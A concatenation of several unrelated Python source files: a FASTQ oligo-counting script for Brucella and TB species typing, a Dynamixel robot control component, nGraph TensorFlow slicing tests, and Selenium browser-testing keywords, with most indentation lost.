oligo_dict["21_tb2"] = "ATGTCTGCGTAAAGAAGTTCCATGTCCGGGAAGTA"
oligo_dict["22_tb3"] = "GAAGACCTTGATGCCGATCTGGGTGTCGATCTTGA"
oligo_dict["23_tb4"] = "CGGTGTTGAAGGGTCCCCCGTTCCAGAAGCCGGTG"
oligo_dict["24_tb6"] = "ACGGTGATTCGGGTGGTCGACACCGATGGTTCAGA"
oligo_dict["25_para"] = "CCTTTCTTGAAGGGTGTTCG"
oligo_dict["26_para_sheep"] = "CGTGGTGGCGACGGCGGCGGGCCTGTCTAT"
oligo_dict["27_para_cattle"] = "TCTCCTCGGTCGGTGATTCGGGGGCGCGGT"
return oligo_dict
def get_seq_counts(value, fastq_list, gzipped):
count = 0
for fastq_file in fastq_list:
if gzipped:
with gzip.open(fastq_file, 'rt') as fh:
for title, seq, qual in FastqGeneralIterator(fh):
count += seq.count(value)
else:
with open(fastq_file, 'r') as fh:
for title, seq, qual in FastqGeneralIterator(fh):
count += seq.count(value)
return value, count
def get_species_counts(fastq_list, gzipped):
count_summary = {}
oligo_dict = get_oligo_dict()
for v1 in oligo_dict.values():
returned_value, count = get_seq_counts(v1, fastq_list, gzipped)
for key, v2 in oligo_dict.items():
if returned_value == v2:
count_summary.update({key: count})
count_list = []
for v in count_summary.values():
count_list.append(v)
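# The oligo dict is ordered: entries 1-16 target Brucella, 17-24 target TB
# (bovis) and 25-27 target paraTB, which is why the counts are split below.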
brucella_sum = sum(count_list[:16])
bovis_sum = sum(count_list[16:24])
para_sum = sum(count_list[24:])
return count_summary, count_list, brucella_sum, bovis_sum, para_sum
def get_species_strings(count_summary):
binary_dictionary = {}
for k, v in count_summary.items():
if v > 1:
binary_dictionary.update({k: 1})
else:
binary_dictionary.update({k: 0})
binary_dictionary = OrderedDict(sorted(binary_dictionary.items()))
binary_list = []
for v in binary_dictionary.values():
binary_list.append(v)
brucella_binary = binary_list[:16]
brucella_string = ''.join(str(e) for e in brucella_binary)
bovis_binary = binary_list[16:24]
bovis_string = ''.join(str(e) for e in bovis_binary)
para_binary = binary_list[24:]
para_string = ''.join(str(e) for e in para_binary)
return brucella_string, bovis_string, para_string
def output_dbkey(file_name, dbkey, output_file):
# Output the dbkey.
with open(output_file, "w") as fh:
fh.write("%s" % dbkey)
def output_files(fastq_file, count_list, group, dbkey, dbkey_file, metrics_file):
base_file_name = get_sample_name(fastq_file)
output_dbkey(base_file_name, dbkey, dbkey_file)
output_metrics(base_file_name, count_list, group, dbkey, metrics_file)
def output_metrics(file_name, count_list, group, dbkey, output_file):
# Output the metrics.
with open(output_file, "w") as fh:
fh.write("Sample: %s\n" % file_name)
fh.write("Brucella counts: ")
for i in count_list[:16]:
fh.write("%d," % i)
fh.write("\nTB counts: ")
for i in count_list[16:24]:
fh.write("%d," % i)
fh.write("\nPara counts: ")
for i in count_list[24:]:
fh.write("%d," % i)
fh.write("\nGroup: %s" % group)
fh.write("\ndbkey: %s\n" % dbkey)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--dnaprint_fields', action='append', dest='dnaprint_fields', nargs=2, help="List of dnaprints data table value and path fields")
parser.add_argument('--read1', action='store', dest='read1', help='Required: single read')
parser.add_argument('--read2', action='store', dest='read2', required=False, default=None, help='Optional: paired read')
parser.add_argument('--gzipped', action='store_true', dest='gzipped', help='Input files are gzipped')
parser.add_argument('--output_dbkey', action='store', dest='output_dbkey', help='Output reference file')
parser.add_argument('--output_metrics', action='store', dest='output_metrics', help='Output metrics file')
args = parser.parse_args()
fastq_list = [args.read1]
if args.read2 is not None:
fastq_list.append(args.read2)
# The value of dnaprint_fields is a list of 2-element lists, where each list
# is the [value, path] components of the vsnp_dnaprints data table.
# The data_manager_vsnp_dnaprints tool assigns the dbkey column from the
# all_fasta data table to the value column in the vsnp_dnaprints data
# table to ensure a proper mapping for discovering the dbkey.
dnaprints_dict = get_dnaprints_dict(args.dnaprint_fields)
# Here fastq_list consists of either a single read
# or a set of paired reads, producing single outputs.
count_summary, count_list, brucella_sum, bovis_sum, para_sum = get_species_counts(fastq_list, args.gzipped)
brucella_string, bovis_string, para_string = get_species_strings(count_summary)
group, dbkey = get_group_and_dbkey(dnaprints_dict, brucella_string, brucella_sum, bovis_string, bovis_sum, para_string, para_sum)
output_files(args.read1, count_list, group, dbkey, dbkey_file=args.output_dbkey, metrics_file=args.output_metrics)
|
|
# Copyright 2019 The ROBEL Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Implementation of HardwareRobotComponent using the DynamixelSDK."""
from typing import Dict, Iterable, Optional, Sequence, Tuple, Union
import numpy as np
from robel.components.robot import ControlMode
from robel.components.robot.dynamixel_client import DynamixelClient
from robel.components.robot.hardware_robot import (
HardwareRobotComponent, HardwareRobotGroupConfig, RobotState)
class DynamixelRobotState(RobotState):
"""Data class that represents the state of a Dynamixel robot."""
def __init__(self, *args, current: Optional[np.ndarray] = None, **kwargs):
"""Initializes a new state object.
Args:
current: The present current reading for the motors, in mA.
"""
super().__init__(*args, **kwargs)
self.current = current
class DynamixelGroupConfig(HardwareRobotGroupConfig):
"""Stores group configuration for a DynamixelRobotComponent."""
def __init__(self,
*args,
motor_ids: Optional[Iterable[int]] = None,
**kwargs):
"""Initializes a new configuration for a HardwareRobotComponent group.
Args:
motor_ids: The Dynamixel motor identifiers to associate with this
group.
"""
super().__init__(*args, **kwargs)
self.motor_ids = None
if motor_ids is not None:
self.motor_ids = np.array(motor_ids, dtype=int)
if self.calib_scale is not None:
assert self.motor_ids.shape == self.calib_scale.shape
if self.calib_offset is not None:
assert self.motor_ids.shape == self.calib_offset.shape
self.motor_id_indices = None
@property
def is_active(self) -> bool:
"""Returns True if the group is not in use."""
return self.motor_ids is not None
def set_all_motor_ids(self, all_motor_ids: Sequence[int]):
"""Sets this group's motor ID mask from the given total list of IDs."""
assert np.all(np.diff(all_motor_ids) > 0), \
'all_motor_ids must be sorted.'
assert np.all(np.isin(self.motor_ids, all_motor_ids))
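# all_motor_ids is sorted, so searchsorted yields the index of each of this
# group's motor IDs within the combined array.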
self.motor_id_indices = np.searchsorted(all_motor_ids, self.motor_ids)
class DynamixelRobotComponent(HardwareRobotComponent):
"""Component for hardware robots using Dynamixel motors."""
# Cache dynamixel_py instances by device path.
DEVICE_CLIENTS = {}
def __init__(self, *args, groups: Dict[str, Dict], device_path: str,
**kwargs):
"""Initializes the component.
Args:
groups: Group configurations for reading/writing state.
device_path: The path to the Dynamixel device to open.
"""
self._combined_motor_ids = set()
super().__init__(*args, groups=groups, **kwargs)
self._all_motor_ids = np.array(
sorted(self._combined_motor_ids), dtype=int)
for group_config in self.groups.values():
if group_config.is_active:
group_config.set_all_motor_ids(self._all_motor_ids)
if device_path not in self.DEVICE_CLIENTS:
hardware = DynamixelClient(
self._all_motor_ids, port=device_path, lazy_connect=True)
self.DEVICE_CLIENTS[device_path] = hardware
self._hardware = self.DEVICE_CLIENTS[device_path]
def _process_group(self, **config_kwargs) -> DynamixelGroupConfig:
"""Processes the configuration for a group."""
config = DynamixelGroupConfig(self.sim_scene, **config_kwargs)
if config.is_active:
self._combined_motor_ids.update(config.motor_ids)
return config
def set_motors_engaged(self, groups: Union[str, Sequence[str], None],
engaged: bool):
"""Enables the motors in the given group name."""
# Interpret None as all motors.
if groups is None:
self._hardware.set_torque_enabled(self._all_motor_ids, engaged)
return
if isinstance(groups, str):
group_configs = [self.get_config(groups)]
else:
group_configs = [self.get_config(name) for name in groups]
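# Build a single boolean mask over all motor IDs covering every selected
# group, so torque is toggled with one hardware write.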
total_motor_id_mask = np.zeros_like(self._all_motor_ids, dtype=bool)
for config in group_configs:
if config.is_active:
total_motor_id_mask[config.motor_id_indices] = True
self._hardware.set_torque_enabled(
self._all_motor_ids[total_motor_id_mask], engaged)
def _get_group_states(
self,
configs: Sequence[DynamixelGroupConfig],
) -> Sequence[DynamixelRobotState]:
"""Returns the states for the given group configurations."""
# Make one call to the hardware to get all of the positions/velocities,
# and extract each individual groups' subset from them.
all_qpos, all_qvel, all_cur = self._hardware.read_pos_vel_cur()
states = []
for config in configs:
state = DynamixelRobotState()
# Append a blank state if this is a sim-only group.
if config.motor_ids is None:
states.append(state)
continue
state.qpos = all_qpos[config.motor_id_indices]
state.qvel = all_qvel[config.motor_id_indices]
state.current = all_cur[config.motor_id_indices]
self._calibrate_state(state, config)
states.append(state)
self._copy_to_simulation_state(zip(configs, states))
return states
def _set_group_states(
self,
group_states: Sequence[Tuple[DynamixelGroupConfig, RobotState]],
block: bool = True,
**block_kwargs):
"""Sets the robot joints to the given states.
Args:
group_states: The states to set for each group.
block: If True, blocks the current thread until completion.
**block_kwargs: Arguments to pass to `_wait_for_desired_states`.
"""
# Filter out sim-only groups.
group_states = [(config, state)
for config, state in group_states
if config.is_active and state.qpos is not None]
if not group_states:
return
# Only write the qpos for the state.
group_control = [(config, state.qpos) for config, state in group_states]
self._set_hardware_control(group_control)
# Block until we've reached the given states.
if block:
self._wait_for_desired_states(group_states, **block_kwargs)
# Reset the step time.
self.reset_time()
def _perform_timestep(
self,
group_controls: Sequence[Tuple[DynamixelGroupConfig, np.ndarray]]):
"""Applies the given control values to the robot."""
self._set_hardware_control(group_controls)
self._synchronize_timestep()
def _set_hardware_control(
self,
group_control: Sequence[Tuple[DynamixelGroupConfig, np.ndarray]]):
"""Sets the desired hardware positions.
Args:
group_control: A list of (group config, control) pairs to write to
the hardware.
"""
total_motor_id_mask = np.zeros_like(self._all_motor_ids, dtype=bool)
total_qpos = np.zeros_like(self._all_motor_ids, dtype=np.float32)
for config, control in group_control:
if config.motor_ids is None:
continue
if control is not None:
# TODO(michaelahn): Consider if other control modes need
# decalibration.
if config.control_mode == ControlMode.JOINT_POSITION:
control = self._decalibrate_qpos(control, config)
total_motor_id_mask[config.motor_id_indices] = True
total_qpos[config.motor_id_indices] = control
if np.any(total_motor_id_mask):
# TODO(michaeahn): Need to switch control mode if we're not in joint
# position control.
self._hardware.write_desired_pos(
self._all_motor_ids[total_motor_id_mask],
total_qpos[total_motor_id_mask])
|
|
# ==============================================================================
# Copyright 2018-2020 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""nGraph TensorFlow bridge slice operation test
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import pytest
import tensorflow as tf
tf.compat.v1.disable_eager_execution()
import numpy as np
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.ops import array_ops
from common import NgraphTest
class TestSliceOperations(NgraphTest):
def test_slice(self):
inp = np.random.rand(4, 4).astype("f")
slice_ts = []
expected = []
a = np.array([float(x) for x in inp.ravel(order="C")])
a.shape = (4, 4)
x = tf.compat.v1.placeholder(dtype=dtypes.float32)
slice_ts.append(array_ops.slice(x, [0, 0], [2, 2]))
slice_ts.append(array_ops.slice(x, [0, 0], [-1, -1]))
slice_ts.append(array_ops.slice(x, [2, 2], [-1, -1]))
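# In array_ops.slice a size of -1 means "all remaining elements in that
# dimension", so the second slice returns the full array and the third the
# bottom-right 2x2 block.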
def run_test(sess):
return sess.run(slice_ts, feed_dict={x: a})
slice_vals = self.with_ngraph(run_test)
expected.append(inp[:2, :2])
expected.append(inp[:, :])
expected.append(inp[2:, 2:])
for v, e in zip(slice_vals, expected):
np.testing.assert_array_equal(v, e)
def test_strided_slice(self):
inp = np.random.rand(4, 5).astype("f")
slice_ts = []
expected = []
a = np.array([float(x) for x in inp.ravel(order="C")])
a.shape = (4, 5)
x = tf.compat.v1.placeholder(dtype=dtypes.float32)
slice_ts.append(x[:])
slice_ts.append(x[:, :])
slice_ts.append(x[1:, :-2])
slice_ts.append(x[::2, :-2])
slice_ts.append(x[1, :])
slice_ts.append(x[:, 1])
slice_ts.append(x[1, 1])
slice_ts.append(x[0])
slice_ts.append(x[0][1])
slice_ts.append(x[-1])
# Various ways of representing identity slice
slice_ts.append(x[:, :])
slice_ts.append(x[::, ::])
slice_ts.append(x[::1, ::1])
# Reverse in each dimension independently
slice_ts.append(x[::-1, :])
slice_ts.append(x[:, ::-1])
## negative index tests i.e. n-2 in first component
slice_ts.append(x[-2::-1, ::1])
# degenerate by offering a forward interval with a negative stride
slice_ts.append(x[0:-1:-1, :])
# degenerate with a reverse interval with a positive stride
slice_ts.append(x[-1:0, :])
# empty interval in every dimension
slice_ts.append(x[-1:0, 2:3:-1])
slice_ts.append(x[2:2, 2:3:-1])
# stride greater than range
slice_ts.append(x[1:3:7, :])
# ellipses and new axis
slice_ts.append(x[:, tf.newaxis])
slice_ts.append(x[...])
slice_ts.append(x[1:2, ...])
def run_test(sess):
return sess.run(slice_ts, feed_dict={x: a})
slice_vals = self.with_ngraph(run_test)
expected.append(inp[:])
expected.append(inp[:, :])
expected.append(inp[1:, :-2])
expected.append(inp[::2, :-2])
expected.append(inp[1, :])
expected.append(inp[:, 1])
expected.append(inp[1, 1])
expected.append(inp[0])
expected.append(inp[0][1])
expected.append(inp[-1])
#TODO: support ellipses and new_axis correctly
# Various ways of representing identity slice
expected.append(inp[:, :])
expected.append(inp[::, ::])
expected.append(inp[::1, ::1])
# Reverse in each dimension independently
expected.append(inp[::-1, :])
expected.append(inp[:, ::-1])
## negative index tests i.e. n-2 in first component
expected.append(inp[-2::-1, ::1])
# degenerate by offering a forward interval with a negative stride
expected.append(inp[0:-1:-1, :])
# degenerate with a reverse interval with a positive stride
expected.append(inp[-1:0, :])
# empty interval in every dimension
expected.append(inp[-1:0, 2:3:-1])
expected.append(inp[2:2, 2:3:-1])
# stride greater than range
expected.append(inp[1:3:7, :])
# ellipses and new axis
expected.append(inp[:, tf.newaxis])
expected.append(inp[...])
expected.append(inp[1:2, ...])
for v, e in zip(slice_vals, expected):
np.testing.assert_array_equal(v, e)
def test_strided_slice_2(self):
inp = np.random.rand(3, 2, 3).astype("f")
slice_ts = []
expected = []
a = np.array([float(x) for x in inp.ravel(order="C")])
a.shape = (3, 2, 3)
x = tf.compat.v1.placeholder(dtype=dtypes.float32)
slice_ts.append(x[0:2, 1:2, 2:1:-1])
def run_test(sess):
return sess.run(slice_ts, feed_dict={x: a})
slice_vals = self.with_ngraph(run_test)
expected.append(inp[0:2, 1:2, 2:1:-1])
for v, e in zip(slice_vals, expected):
np.testing.assert_array_equal(v, e)
def test_strided_slice_3(self):
inp = np.random.rand(3, 2, 3).astype("f")
slice_ts = []
expected = []
a = np.array([float(x) for x in inp.ravel(order="C")])
a.shape = (3, 2, 3)
x = tf.compat.v1.placeholder(dtype=dtypes.float32)
slice_ts.append(x[0:2, -1:3, 2:1:-1])
def run_test(sess):
return sess.run(slice_ts, feed_dict={x: a})
slice_vals = self.with_ngraph(run_test)
expected.append(inp[0:2, -1:3, 2:1:-1])
for v, e in zip(slice_vals, expected):
np.testing.assert_array_equal(v, e)
def test_strided_slice_4(self):
inp = np.random.rand(3, 2, 3).astype("f")
slice_ts = []
expected = []
a = np.array([float(x) for x in inp.ravel(order="C")])
a.shape = (3, 2, 3)
x = tf.compat.v1.placeholder(dtype=dtypes.float32)
slice_ts.append(x[0:1, -2:3, 3:0:-2])
def run_test(sess):
return sess.run(slice_ts, feed_dict={x: a})
slice_vals = self.with_ngraph(run_test)
expected.append(inp[0:1, -2:3, 3:0:-2])
for v, e in zip(slice_vals, expected):
np.testing.assert_array_equal(v, e)
def test_strided_slice_5(self):
a = [[[[[1, 2, 4, 5], [5, 6, 7, 8], [9, 10, 11, 12]]],
[[[13, 14, 15, 16], [17, 18, 19, 20], [21, 22, 23, 24]]]]]
bar = tf.constant(2)
bar2 = tf.constant(3)
x = tf.compat.v1.placeholder(dtype=dtypes.float32)
slice_ts = [
x[..., bar:bar2], x[..., bar], x[..., 3], x[..., 2**64 // 2**63]
]
def run_test(sess):
return sess.run(slice_ts, feed_dict={x: a})
slice_vals_ng = self.with_ngraph(run_test)
slice_vals_tf = self.without_ngraph(run_test)
for v, e in zip(slice_vals_ng, slice_vals_tf):
np.testing.assert_array_equal(v, e)
def test_strided_slice_zerodim(self):
inp = np.random.rand(4, 0, 5).astype("f")
slice_ts = []
expected = []
a = np.array([float(x) for x in inp.ravel(order="C")])
a.shape = (4, 0, 5)
x = tf.compat.v1.placeholder(dtype=dtypes.float32)
#(slicing an empty dim by empty slice)
slice_ts.append(x[1:2, 2:2, 1:2])
#(slicing an empty dim by non empty slice)
slice_ts.append(x[1:2, 1:2, 1:2])
def run_test(sess):
return sess.run(slice_ts, feed_dict={x: a})
slice_vals = self.with_ngraph(run_test)
expected.append(inp[1:2, 2:2, 1:2])
expected.append(inp[1:2, 1:2, 1:2])
for v, e in zip(slice_vals, expected):
np.testing.assert_array_equal(v, e)
def test_incorrect_strided_slice(self):
inp = 0
slice_ts = []
x = tf.compat.v1.placeholder(dtype=dtypes.float32)
# slicing a scalar input should raise an error
slice_ts.append(x[1:1])
def run_test(sess):
return sess.run(slice_ts, feed_dict={x: inp})
with pytest.raises(Exception) as excinfo:
slice_vals = self.with_ngraph(run_test)
assert excinfo.value.message
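# --- Added illustrative sketch (not part of the original test suite) ---------
# The tests above rely on tf.slice's convention that a size of -1 means
# "everything up to the end of that dimension", e.g. array_ops.slice(x, [2, 2],
# [-1, -1]) corresponds to inp[2:, 2:] in NumPy. A minimal standalone check of
# that assumption on stock TensorFlow (no nGraph involved):
if __name__ == "__main__":
    _demo = np.arange(16, dtype=np.float32).reshape(4, 4)
    _x = tf.compat.v1.placeholder(dtype=dtypes.float32)
    _t = array_ops.slice(_x, [2, 2], [-1, -1])
    with tf.compat.v1.Session() as _sess:
        np.testing.assert_array_equal(
            _sess.run(_t, feed_dict={_x: _demo}), _demo[2:, 2:])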
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.action_chains import ActionChains
from Selenium2Library import utils
from Selenium2Library.locators import ElementFinder
from keywordgroup import KeywordGroup
class _ElementKeywords(KeywordGroup):
def __init__(self):
self._element_finder = ElementFinder()
# Public, element lookups
def current_frame_contains(self, text, loglevel='INFO'):
"""Verifies that current frame contains `text`.
See `Page Should Contain` for explanation about `loglevel` argument.
"""
if not self._is_text_present(text):
self.log_source(loglevel)
raise AssertionError("Page should have contained text '%s' "
"but did not" % text)
self._info("Current page contains text '%s'." % text)
def element_should_contain(self, locator, expected, message=''):
"""Verifies element identified by `locator` contains text `expected`.
If you wish to assert an exact (not a substring) match on the text
of the element, use `Element Text Should Be`.
`message` can be used to override the default error message.
Key attributes for arbitrary elements are `id` and `name`. See
`introduction` for details about locating elements.
"""
self._info("Verifying element '%s' contains text '%s'."
% (locator, expected))
actual = self._get_text(locator)
if not expected in actual:
if not message:
message = "Element '%s' should have contained text '%s' but "\
"its text was '%s'." % (locator, expected, actual)
raise AssertionError(message)
def element_should_not_contain(self, locator, not_expected, message=''):
"""Verifies element identified by `locator` does not contain text `not_expected`.
If you wish to assert an exact (not a substring) match on the text
of the element, use `Element Text Should Be`.
`message` can be used to override the default error message.
Key attributes for arbitrary elements are `id` and `name`. See
`introduction` for details about locating elements.
"""
self._info("Verifying element '%s' does not contain text '%s'."
% (locator, not_expected))
actual = self._get_text(locator)
if not_expected in actual:
if not message:
message = "Element '%s' should not have contained text '%s' but "\
"its text was '%s'." %(locator, not_expected, actual)
raise AssertionError(message)
def frame_should_contain(self, locator, text, loglevel='INFO'):
"""Verifies frame identified by `locator` contains `text`.
See `Page Should Contain` for explanation about `loglevel` argument.
Key attributes for frames are `id` and `name`. See `introduction` for
details about locating elements.
"""
if not self._frame_contains(locator, text):
self.log_source(loglevel)
raise AssertionError("Page should have contained text '%s' "
"but did not" % text)
self._info("Current page contains text '%s'." % text)
def page_should_contain(self, text, loglevel='INFO'):
"""Verifies that current page contains `text`.
If this keyword fails, it automatically logs the page source
using the log level specified with the optional `loglevel` argument.
Giving `NONE` as level disables logging.
"""
if not self._page_contains(text):
self.log_source(loglevel)
raise AssertionError("Page should have contained text '%s' "
"but did not" % text)
self._info("Current page contains text '%s'." % text)
def page_should_contain_element(self, locator, message='', loglevel='INFO'):
"""Verifies element identified by `locator` is found on the current page.
`message` can be used to override default error message.
See `Page Should Contain` for explanation about `loglevel` argument.
Key attributes for arbitrary elements are `id` and `name`. See
`introduction` for details about locating elements.
"""
self._page_should_contain_element(locator, None, message, loglevel)
def page_should_not_contain(self, text, loglevel='INFO'):
"""Verifies the current page does not contain `text`.
See `Page Should Contain` for explanation about `loglevel` argument.
"""
if self._page_contains(text):
self.log_source(loglevel)
raise AssertionError("Page should not have contained text '%s'" % text)
self._info("Current page does not contain text '%s'." % text)
def page_should_not_contain_element(self, locator, message='', loglevel='INFO'):
"""Verifies element identified by `locator` is not found on the current page.
`message` can be used to override the default error message.
See `Page Should Contain` for explanation about `loglevel` argument.
Key attributes for arbitrary elements are `id` and `name`. See
`introduction` for details about locating elements.
"""
self._page_should_not_contain_element(locator, None, message, loglevel)
# Public, attributes
def assign_id_to_element(self, locator, id):
"""Assigns a temporary identifier to element specified by `locator`.
This is mainly useful if the locator is a complicated or slow XPath expression.
Identifier expires when the page is reloaded.
Example:
| Assign ID to Element | xpath=//div[@id="first_div"] | my id |
| Page Should Contain Element | my id |
"""
self._info("Assigning temporary id '%s' to element '%s'" % (id, locator))
element = self._element_find(locator, True, True)
self._current_browser().execute_script("arguments[0].id = '%s';" % id, element)
def element_should_be_disabled(self, locator):
"""Verifies that element identified with `locator` is disabled.
Key attributes for arbitrary elements are `id` and `name`. See
`introduction` for details about locating elements.
"""
if self._is_enabled(locator):
raise AssertionError("Element '%s' is enabled." % (locator))
def element_should_be_enabled(self, locator):
"""Verifies that element identified with `locator` is enabled.
Key attributes for arbitrary elements are `id` and `name`. See
`introduction` for details about locating elements.
"""
if not self._is_enabled(locator):
raise AssertionError("Element '%s' is disabled." % (locator))
def element_should_be_visible(self, locator, message=''):
"""Verifies that the element identified by `locator` is visible.
Herein, visible means that the element is logically visible, not optically
visible in the current browser viewport. For example, an element that carries
display:none is not logically visible, so using this keyword on that element
would fail.
`message` can be used to override the default error message.
Key attributes for arbitrary elements are `id` and `name`. See
`introduction` for details about locating elements.
"""
self._info("Verifying element '%s' is visible." % locator)
visible = self._is_visible(locator)
if not visible:
if not message:
message = "The element '%s' should be visible, but it "\
"is not." % locator
raise AssertionError(message)
def element_should_not_be_visible(self, locator, message=''):
"""Verifies that the element identified by `locator` is NOT visible.
This is the opposite of `Element Should Be Visible`.
`message` can be used to override the default error message.
Key attributes for arbitrary elements are `id` and `name`. See
`introduction` for details about locating elements.
"""
self._info("Verifying element '%s' is not visible." % locator)
visible = self._is_visible(locator)
if visible:
if not message:
message = "The element '%s' should not be visible, "\
"but it is." % locator
raise AssertionError(message)
def element_text_should_be(self, locator, expected, message=''):
"""Verifies element identified by `locator` exactly contains text `expected`.
In contrast to `Element Should Contain`, this keyword does not try
a substring match but an exact match on the element identified by `locator`.
`message` can be used to override the default error message.
Key attributes for arbitrary elements are `id` and `name`. See
`introduction` for details about locating elements.
"""
self._info("Verifying element '%s' contains exactly text '%s'."
% (locator, expected))
element = self._element_find(locator, True, True)
actual = element.text
if expected != actual:
if not message:
message = "The text of element '%s' should have been '%s' but "\
"in fact it was '%s'." % (locator, expected, actual)
raise AssertionError(message)
def get_element_text(self, locator, strip_text=True):
"""Gets text contained in element, found by locator.
By default it removes whitespace from the beginning and end
of the text. That behavior can be changed by passing the `strip_text`
argument.
Key attributes for arbitrary elements are `id` and `name`. See
`introduction` for details about locating elements.
"""
element = self._element_find(locator, True, False)
if element is None:
raise ValueError("Element '%s' not found." % (locator))
if strip_text:
return element.text.strip()
else:
return element.text
def get_element_attribute(self, attribute_locator):
"""Return value of element attribute.
`attribute_locator` consists of element locator followed by an @ sign
and attribute name, for example "element_id@class".
"""
locator, attribute_name = self._parse_attribute_locator(attribute_locator)
element = self._element_find(locator, True, False)
if element is None:
raise ValueError("Element '%s' not found." % (locator))
return element.get_attribute(attribute_name)
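# Added note (illustrative, not part of Selenium2Library): the attribute locator
# above combines an element locator and an attribute name with the last '@' sign,
# e.g. "element_id@class" is split by _parse_attribute_locator() into
# ("element_id", "class") before the element lookup and get_attribute() call.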
def get_horizontal_position(self, locator):
"""Returns horizontal position of element identified by `locator`.
The position is returned in pixels off the left side of the page,
as an integer. Fails if a matching element is not found.
See also `Get Vertical Position`.
"""
element = self._element_find(locator, True, False)
if element is None:
raise AssertionError("Could not determine position for '%s'" % (locator))
return element.location['x']
def get_value(self, locator):
"""Returns the value attribute of element identified by `locator`.
See `introduction` for details about locating elements.
"""
return self._get_value(locator)
def get_text(self, locator):
"""Returns the text value of element identified by `locator`.
See `introduction` for details about locating elements.
"""
return self._get_text(locator)
def get_vertical_position(self, locator):
"""Returns vertical position of element identified by `locator`.
The position is returned in pixels off the top of the page,
as an integer. Fails if a matching element is not found.
See also `Get Horizontal Position`.
"""
element = self._element_find(locator, True, False)
if element is None:
raise AssertionError("Could not determine position for '%s'" % (locator))
return element.location['y']
# Public, mouse input/events
def click_element(self, locator):
"""Click element identified by `locator`.
Key attributes for arbitrary elements are `id` and `name`. See
`introduction` for details about locating elements.
"""
self._info("Clicking element '%s'." % locator)
self._element_find(locator, True, True).click()
def double_click_element(self, locator):
"""Double click element identified by `locator`.
Key attributes for arbitrary elements are `id` and `name`. See
`introduction` for details about locating elements.
"""
self._info("Double clicking element '%s'." % locator)
element = self._element_find(locator, True, True)
ActionChains(self._current_browser()).double_click(element).perform()
def focus(self, locator):
"""Sets focus to element identified by `locator`."""
element = self._element_find(locator, True, True)
self._current_browser().execute_script("arguments[0].focus();", element)
def drag_and_drop(self, source, target):
"""Drags element identified with `source` which is a locator.
Element can be moved on top of another element with `target`
argument.
`target` is a locator of the element where the dragged object is
dropped.
Examples:
| Drag And Drop | elem1 | elem2 | # Move elem1 over elem2. |
"""
src_elem = self._element_find(source,True,True)
trg_elem = self._element_find(target,True,True)
ActionChains(self._current_browser()).drag_and_drop(src_elem, trg_elem).perform()
def drag_and_drop_by_offset(self, source, xoffset, yoffset):
"""Drags element identified with `source` which is a locator.
Element will be moved by `xoffset` and `yoffset`, each of which is a
negative or positive number specifying the offset.
Examples:
| Drag And Drop By Offset | myElem | 50 | -35 | # Move myElem 50px right and 35px up. |
"""
src_elem = self._element_find(source, True, True)
ActionChains(self._current_browser()).drag_and_drop_by_offset(src_elem, xoffset, yoffset).perform()
def mouse_down(self, locator):
"""Simulates pressing the left mouse button on the element specified by `locator`.
The element is pressed without releasing the mouse button.
Key attributes for arbitrary elements are `id` and `name`. See
`introduction` for details about locating elements.
See also the more specific keywords `Mouse Down On Image` and
`Mouse Down On Link`.
"""
self._info("Simulating Mouse Down on element '%s'" % locator)
element = self._element_find(locator, True, False)
if element is None:
raise AssertionError("ERROR: Element %s not found." % (locator))
ActionChains(self._current_browser()).click_and_hold(element).perform()
def mouse_out(self, locator):
"""Simulates moving mouse away from the element specified by `locator`.
Key attributes for arbitrary elements are `id` and `name`. See
`introduction` for details about locating elements.
"""
self._info("Simulating Mouse Out on element '%s'" % locator)
element = self._element_find(locator, True, False)
if element is None:
raise AssertionError("ERROR: Element %s not found." % (locator))
size = element.size
offsetx = (size['width'] / 2) + 1
offsety = (size['height'] / 2) + 1
ActionChains(self._current_browser()).move_to_element(element).move_by_offset(offsetx, offsety).perform()
def mouse_over(self, locator):
"""Simulates hovering mouse over the element specified by `locator`.
Key attributes for arbitrary elements are `id` and `name`. See
`introduction` for details about locating elements.
"""
self._info("Simulating Mouse Over on element '%s'" % locator)
element = self._element_find(locator, True, False)
if element is None:
raise AssertionError("ERROR: Element %s not found." % (locator))
ActionChains(self._current_browser()).move_to_element(element).perform()
def mouse_up(self, locator):
"""Simulates releasing the left mouse button on the element specified by `locator`.
Key attributes for arbitrary elements are `id` and `name`. See
`introduction` for details about locating elements.
"""
self._info("Simulating Mouse Up on element '%s'" % locator)
element = self._element_find(locator, True, False)
if element is None:
raise AssertionError("ERROR: Element %s not found." % (locator))
ActionChains(self._current_browser()).click_and_hold(element).release(element).perform()
def open_context_menu(self, locator):
"""Opens context menu on element identified by `locator`."""
element = self._element_find(locator, True, True)
ActionChains(self._current_browser()).context_click(element).perform()
def simulate(self, locator, event):
"""Simulates `event` on element identified by `locator`.
This keyword is useful if the element has an OnEvent handler that needs to be
explicitly invoked.
See `introduction` for details about locating elements.
"""
element = self._element_find(locator, True, True)
script = """
element = arguments[0];
eventName = arguments[1];
if (document.createEventObject) { // IE
return element.fireEvent('on' + eventName, document.createEventObject());
}
var evt = document.createEvent("HTMLEvents");
evt.initEvent(eventName, true, true);
return !element.dispatchEvent(evt);
"""
self._current_browser().execute_script(script, element, event)
def press_key(self, locator, key):
"""Simulates user pressing key on element identified by `locator`.
`key` is either a single character, or a numerical ASCII code of the key
preceded by '\\'.
Examples:
| Press Key | text_field | q |
| Press Key | login_button | \\13 | # ASCII code for enter key |
"""
if key.startswith('\\') and len(key) > 1:
key = self._map_ascii_key_code_to_key(int(key[1:]))
#if len(key) > 1:
# raise ValueError("Key value '%s' is invalid.", key)
element = self._element_find(locator, True, True)
#select it
element.send_keys(key)
